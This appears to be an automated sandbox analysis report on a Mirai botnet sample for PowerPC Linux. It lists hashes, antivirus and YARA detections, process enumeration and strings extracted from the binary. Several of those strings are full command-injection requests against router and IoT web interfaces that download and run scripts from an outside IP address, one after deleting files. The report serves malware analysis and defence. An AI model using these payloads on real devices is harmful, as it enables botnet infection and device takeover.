Linux Analysis Report
2EH9KnMcj7

Overview

General Information

Sample Name: 2EH9KnMcj7
Analysis ID: 679615
MD5: 85455cd1f6a69942e7432acdb3b15d70
SHA1: b3e68c30a45963c609e8d8f601cbc0e60e8181a6
SHA256: d56021eaf57dc41b3e3525d8137c2fd7055d54cdfc989e7bb5a571bea3cd2a52
Tags: 32, elf, mirai, powerpc

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

Source: 2EH9KnMcj7 Avira: detected
Source: 2EH9KnMcj7 Virustotal: Detection: 59%
Source: 2EH9KnMcj7 Metadefender: Detection: 31%
Source: 2EH9KnMcj7 ReversingLabs: Detection: 61%
Source: /tmp/2EH9KnMcj7 (PID: 6234) Socket: 127.0.0.1::44455
Source: 2EH9KnMcj7 String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: 2EH9KnMcj7 String found in binary or memory: http://purenetworks.com/HNAP1/
Source: 2EH9KnMcj7 String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 2EH9KnMcj7 String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 2EH9KnMcj7, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.00007fd71802d000.00007fd71802e000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6234.1.00007fd71802d000.00007fd71802e000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6234.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal64.troj.lin@0/0@0/0
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6196/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1582/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2033/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2275/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/3088/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6193/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1612/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1579/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1699/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1335/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1698/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2028/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1334/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1576/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2302/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/3236/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2025/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2146/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/910/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/912/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/517/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/759/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2307/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/918/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6243/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6242/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6244/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6247/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1594/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2285/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2281/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1349/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1623/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/761/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1622/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/884/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1983/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2038/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1344/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1465/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1586/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1463/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2156/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/800/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6238/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/801/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1629/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1627/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1900/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6252/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6251/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6255/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6257/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/3021/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/491/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2294/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2050/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1877/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/772/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1633/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1599/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1632/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/774/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1477/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/654/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/896/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1476/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1872/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2048/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/655/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1475/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2289/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/656/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/777/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/657/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4466/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6249/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/658/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4467/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4468/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4469/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/419/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/936/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1639/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4503/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1638/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2208/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2180/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6262/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6267/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6266/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1809/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6268/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1494/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1890/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2063/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2062/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6260/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1888/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1886/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/420/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1489/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/785/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1642/exe
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/788/exe
Source: /tmp/2EH9KnMcj7 (PID: 6234) Queries kernel information via 'uname'
Source: 2EH9KnMcj7, 6234.1.0000561da275d000.0000561da280d000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
Source: 2EH9KnMcj7, 6237.1.0000561da275d000.0000561da280d000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: 2EH9KnMcj7, 6234.1.0000561da275d000.0000561da280d000.rw-.sdmp, 2EH9KnMcj7, 6237.1.0000561da275d000.0000561da280d000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: 2EH9KnMcj7, 6234.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp, 2EH9KnMcj7, 6237.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
Source: 2EH9KnMcj7, 6234.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp, 2EH9KnMcj7, 6237.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/2EH9KnMcj7SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/2EH9KnMcj7

Stealing of Sensitive Information

Source: Yara match File source: 2EH9KnMcj7, type: SAMPLE
Source: Yara match File source: 6237.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 2EH9KnMcj7, type: SAMPLE
Source: Yara match File source: 6237.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY
No contacted IP infos